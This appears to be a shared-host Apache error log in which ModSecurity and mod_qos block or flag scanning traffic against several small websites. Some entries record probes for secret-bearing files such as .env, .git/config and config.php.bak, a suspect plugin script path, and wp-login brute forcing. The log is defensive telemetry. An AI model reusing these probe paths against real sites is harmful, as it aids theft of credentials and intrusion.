[Tue May 26 20:00:22.666160 2026] [security2:error] [pid 93576:tid 93749] [client 103.163.220.45:61545] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/info.php"] [unique_id "ahWufmDRMqfxdEDkoswBywAAACU"]
[Tue May 26 20:00:22.769800 2026] [security2:error] [pid 106517:tid 106666] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eQAAAlSk"]
[Tue May 26 20:00:22.986481 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eTAAAsyw"], referer: https://www.ndequipments.com/config.json.save
[Tue May 26 20:00:22.990602 2026] [qos:error] [pid 106517:tid 106691] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWufoZZc2DoU1lPnP1ekgAAAK0
[Tue May 26 20:00:22.991432 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWufoZZc2DoU1lPnP1ekQAAAMQ
[Tue May 26 20:00:22.991744 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWufmDRMqfxdEDkoswB9QAAADY
[Tue May 26 20:00:22.992000 2026] [qos:error] [pid 106517:tid 106664] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWufoZZc2DoU1lPnP1ekwAAAJM
[Tue May 26 20:00:22.998121 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWufmDRMqfxdEDkoswB-wAAADQ
[Tue May 26 20:00:23.078162 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuf2DRMqfxdEDkoswCAAAAADo
[Tue May 26 20:00:23.080058 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuf2DRMqfxdEDkoswCAQAAADI
[Tue May 26 20:00:23.081823 2026] [qos:error] [pid 93576:tid 93837] [client 45.148.10.120:46668] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuf2DRMqfxdEDkoswCAwAAAH0
[Tue May 26 20:00:23.082031 2026] [qos:error] [pid 93576:tid 93805] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuf2DRMqfxdEDkoswCAgAAAF0
[Tue May 26 20:00:23.140052 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuf2DRMqfxdEDkoswCBAAAAHE
[Tue May 26 20:00:23.140903 2026] [qos:error] [pid 106517:tid 106682] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuf4ZZc2DoU1lPnP1emgAAAKQ
[Tue May 26 20:00:23.144562 2026] [qos:error] [pid 93576:tid 93721] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuf2DRMqfxdEDkoswCBQAAAAk
[Tue May 26 20:00:23.146857 2026] [qos:error] [pid 106517:tid 106726] [client 45.148.10.120:46708] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuf4ZZc2DoU1lPnP1emwAAANA
[Tue May 26 20:00:23.149978 2026] [security2:error] [pid 93576:tid 93781] [remote 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswBwQAAbgc"]
[Tue May 26 20:00:23.151970 2026] [qos:error] [pid 93576:tid 93727] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuf2DRMqfxdEDkoswCBwAAAA8
[Tue May 26 20:00:23.167227 2026] [security2:error] [pid 93576:tid 93780] [client 103.163.220.7:42129] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/js/widgets/"] [unique_id "ahWuf2DRMqfxdEDkoswCCAAAAEQ"]
[Tue May 26 20:00:23.180477 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWuf2DRMqfxdEDkoswCBgAARRc"]
[Tue May 26 20:00:23.221743 2026] [qos:error] [pid 106517:tid 106764] [client 45.148.10.120:46738] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuf4ZZc2DoU1lPnP1eoQAAAPY
[Tue May 26 20:00:23.290558 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBiwAAAAM"]
[Tue May 26 20:00:23.293267 2026] [security2:error] [pid 93576:tid 93729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBhAAAABE"]
[Tue May 26 20:00:23.294205 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1d9gAAAPE"]
[Tue May 26 20:00:23.296922 2026] [security2:error] [pid 106517:tid 106698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1d7QAAALQ"]
[Tue May 26 20:00:23.318220 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1eCwAAANY"]
[Tue May 26 20:00:23.319171 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1d_QAAAKU"]
[Tue May 26 20:00:23.321504 2026] [security2:error] [pid 106517:tid 106733] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eRQAAANc"]
[Tue May 26 20:00:23.328199 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBigAAABw"]
[Tue May 26 20:00:23.329060 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBnwAAAFU"]
[Tue May 26 20:00:23.332077 2026] [security2:error] [pid 106517:tid 106715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1eCgAAAMU"]
[Tue May 26 20:00:23.340093 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBsQAAAGA"]
[Tue May 26 20:00:23.340961 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBmwAAAA0"]
[Tue May 26 20:00:23.341111 2026] [security2:error] [pid 106517:tid 106757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1eFAAAAO8"]
[Tue May 26 20:00:23.341153 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBnAAAADU"]
[Tue May 26 20:00:23.365238 2026] [security2:error] [pid 106517:tid 106685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eSQAAAKc"]
[Tue May 26 20:00:23.371962 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eVAAAAI4"]
[Tue May 26 20:00:23.375051 2026] [security2:error] [pid 106517:tid 106741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eWAAAAN8"]
[Tue May 26 20:00:23.377875 2026] [security2:error] [pid 106517:tid 106771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufYZZc2DoU1lPnP1eEwAAAP0"]
[Tue May 26 20:00:23.378770 2026] [security2:error] [pid 106517:tid 106665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eSwAAAJQ"]
[Tue May 26 20:00:23.380284 2026] [security2:error] [pid 93576:tid 93791] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufWDRMqfxdEDkoswBpQAAAE8"]
[Tue May 26 20:00:23.387228 2026] [security2:error] [pid 106517:tid 106661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eXwAAAJA"]
[Tue May 26 20:00:23.387268 2026] [security2:error] [pid 106517:tid 106718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eYAAAAMg"]
[Tue May 26 20:00:23.399913 2026] [security2:error] [pid 106517:tid 106777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eWwAAAQM"]
[Tue May 26 20:00:23.402008 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eTQAAAQQ"]
[Tue May 26 20:00:23.402576 2026] [security2:error] [pid 106517:tid 106652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eSAAAAIc"]
[Tue May 26 20:00:23.404610 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1ebAAAAOM"]
[Tue May 26 20:00:23.406233 2026] [security2:error] [pid 106517:tid 106662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eXgAAAJE"]
[Tue May 26 20:00:23.420011 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWuf2DRMqfxdEDkoswCCwAAbQo"], referer: https://www.ndequipments.com/admin/.env
[Tue May 26 20:00:23.426708 2026] [security2:error] [pid 106517:tid 106668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1ebgAAAJc"]
[Tue May 26 20:00:23.426756 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswB3QAAAFY"]
[Tue May 26 20:00:23.442711 2026] [security2:error] [pid 93576:tid 93714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswB5wAAAAI"]
[Tue May 26 20:00:23.617582 2026] [security2:error] [pid 106517:tid 106765] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWuf4ZZc2DoU1lPnP1ergAA9zo"]
[Tue May 26 20:00:23.720309 2026] [security2:error] [pid 93576:tid 93584] [remote 82.159.200.145:25795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.200.159.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuf2DRMqfxdEDkoswCDwAAQgU"]
[Tue May 26 20:00:23.770341 2026] [security2:error] [pid 93576:tid 93743] [client 103.163.220.23:34507] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/enhanced-text-widget/analyst/src/403x.php"] [unique_id "ahWuf2DRMqfxdEDkoswCFQAAAB8"]
[Tue May 26 20:00:23.822810 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWuf4ZZc2DoU1lPnP1eugAAz04"], referer: https://www.ndequipments.com/.git/config
[Tue May 26 20:00:24.013232 2026] [security2:error] [pid 93576:tid 93601] [remote 45.148.10.62:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ndequipments.com"] [uri "/config.php"] [unique_id "ahWugGDRMqfxdEDkoswCIQAASRY"]
[Tue May 26 20:00:24.096820 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:54230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCTQAAAAc
[Tue May 26 20:00:24.097287 2026] [qos:error] [pid 106517:tid 106676] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1e7wAAAJ8
[Tue May 26 20:00:24.097614 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCTwAAAEo
[Tue May 26 20:00:24.097653 2026] [qos:error] [pid 93576:tid 93789] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCTgAAAE0
[Tue May 26 20:00:24.099336 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCUAAAAFo
[Tue May 26 20:00:24.106598 2026] [security2:error] [pid 93576:tid 93599] [remote 82.159.200.145:25795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.200.159.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWugGDRMqfxdEDkoswCJAAAOBQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:00:24.111859 2026] [qos:error] [pid 106517:tid 106741] [client 45.148.10.120:46692] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1e8QAAAN8
[Tue May 26 20:00:24.113985 2026] [qos:error] [pid 106517:tid 106674] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1e8gAAAJ0
[Tue May 26 20:00:24.114239 2026] [qos:error] [pid 106517:tid 106698] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWugIZZc2DoU1lPnP1e9AAAALQ
[Tue May 26 20:00:24.114246 2026] [qos:error] [pid 106517:tid 106677] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWugIZZc2DoU1lPnP1e9QAAAKA
[Tue May 26 20:00:24.124471 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWugGDRMqfxdEDkoswCUwAAAAY
[Tue May 26 20:00:24.177580 2026] [security2:error] [pid 106517:tid 106610] [remote 45.148.10.62:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ndequipments.com"] [uri "/config.php.bak"] [unique_id "ahWugIZZc2DoU1lPnP1e-wAAmlo"]
[Tue May 26 20:00:24.245569 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:54230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCVQAAAGY
[Tue May 26 20:00:24.247247 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCVgAAAC0
[Tue May 26 20:00:24.247650 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCVwAAAG0
[Tue May 26 20:00:24.251126 2026] [qos:error] [pid 106517:tid 106661] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1e_QAAAJA
[Tue May 26 20:00:24.267726 2026] [qos:error] [pid 106517:tid 106718] [client 45.148.10.120:46692] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1e_wAAAMg
[Tue May 26 20:00:24.268866 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCWQAAABc
[Tue May 26 20:00:24.269411 2026] [qos:error] [pid 106517:tid 106725] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1fAAAAAM8
[Tue May 26 20:00:24.279908 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCWgAAAAI
[Tue May 26 20:00:24.282257 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugGDRMqfxdEDkoswCWwAAAGw
[Tue May 26 20:00:24.287337 2026] [qos:error] [pid 106517:tid 106735] [client 45.148.10.120:46732] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWugIZZc2DoU1lPnP1fAQAAANk
[Tue May 26 20:00:24.290169 2026] [security2:error] [pid 106517:tid 106680] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eYgAAAKI"]
[Tue May 26 20:00:24.290365 2026] [security2:error] [pid 106517:tid 106657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1eawAAAIw"]
[Tue May 26 20:00:24.293927 2026] [security2:error] [pid 106517:tid 106658] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufoZZc2DoU1lPnP1edQAAAI0"]
[Tue May 26 20:00:24.293948 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWufmDRMqfxdEDkoswB8QAAAH4"]
